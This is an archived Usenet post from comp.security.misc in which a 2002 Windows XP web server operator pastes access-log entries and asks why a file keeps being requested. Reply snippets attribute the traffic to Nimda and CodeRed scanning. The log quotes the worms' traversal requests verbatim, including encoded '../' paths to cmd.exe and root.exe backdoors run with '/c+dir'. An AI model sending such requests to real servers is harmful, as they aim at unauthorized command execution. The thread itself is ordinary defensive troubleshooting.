CMD.exe

From: Lee (lee3925@hotmail.com)
Date: 11/27/02

• Next message: phn@icke-reklam.ipsec.nu: "Re: DNS traffic from DMZ to internal network - Is it vulnerable?"
• Previous message: Eirik Seim: "Re: netbios"
• Next in thread: Barry Margolin: "Re: CMD.exe"
• Reply: Barry Margolin: "Re: CMD.exe"
• Reply: Don Kelloway: "Re: CMD.exe"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

From: lee3925@hotmail.com (Lee)
Date: 27 Nov 2002 11:44:11 -0800

24.130.88.22 - - [26/Nov/2002:14:46:46 +1133] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 144
24.159.70.125 - - [26/Nov/2002:14:51:27 +1133] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 302 144
24.159.70.125 - - [26/Nov/2002:14:51:27 +1133] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 302 144
24.159.70.125 - - [26/Nov/2002:14:51:28 +1133] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 144
24.159.70.125 - - [26/Nov/2002:14:51:28 +1133] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 144
24.159.70.125 - - [26/Nov/2002:14:51:29 +1133] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 144
24.159.70.125 - - [26/Nov/2002:14:51:29 +1133] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 302 144
24.159.70.125 - - [26/Nov/2002:14:51:30 +1133] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 302 144
24.159.70.125 - - [26/Nov/2002:14:51:33 +1133] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 302 144

------------

I am having this file trying to be obtained from my webserver
constantly. I have ran test on my computer for both nimda and CodeRed
and both have resulted negative. I also have downloaded the IIS patch
from Microsoft and the problems still exist. Any ideas? I am running
a webserver on Windows XP. Any/All help is appreciated.

---

• Next message: phn@icke-reklam.ipsec.nu: "Re: DNS traffic from DMZ to internal network - Is it vulnerable?"
• Previous message: Eirik Seim: "Re: netbios"
• Next in thread: Barry Margolin: "Re: CMD.exe"
• Reply: Barry Margolin: "Re: CMD.exe"
• Reply: Don Kelloway: "Re: CMD.exe"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

Relevant Pages Re: CMD.exe ... It would appear that your logs reflect various attempts to see if your ... All of which are "Threats to Your Security on the Internet". ... I have ran test on my computer for both nimda and CodeRed ... > a webserver on Windows XP. ... (comp.security.misc) Re: CMD.exe ... I have ran test on my computer for both nimda and CodeRed ... >a webserver on Windows XP. ... The infected machines are the ones that are connecting to you, ... (comp.security.misc) RE: vs2005: domain trust relationship problem ... >From the error message, this seems a domain trust issue, is your webserver ... domain's info such as performing windows authentication cross domain, ... Microsoft Online Support ... | Thread-Topic: vs2005: domain trust relationship problem ... (microsoft.public.dotnet.framework.aspnet) Re: Strange log entry - hacker attack? ... > It's the Nimda exploit for index server ... The webserver seemed to send back ... Is this something I need to worry about? ... (microsoft.public.inetserver.iis.security) Re: Access problem Apache/mod_auth_kerb/AD ... Can you tell me how I switch to the internal SPNEGO? ... Our KDC is a Windows 2003 AD Server with address "company.corp" ... Webserver running on an OpenSuse with mod_auth_kerb. ... Administrators group. ... (comp.protocols.kerberos)

---

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Newsgroups  > comp.security.misc  > 2002-11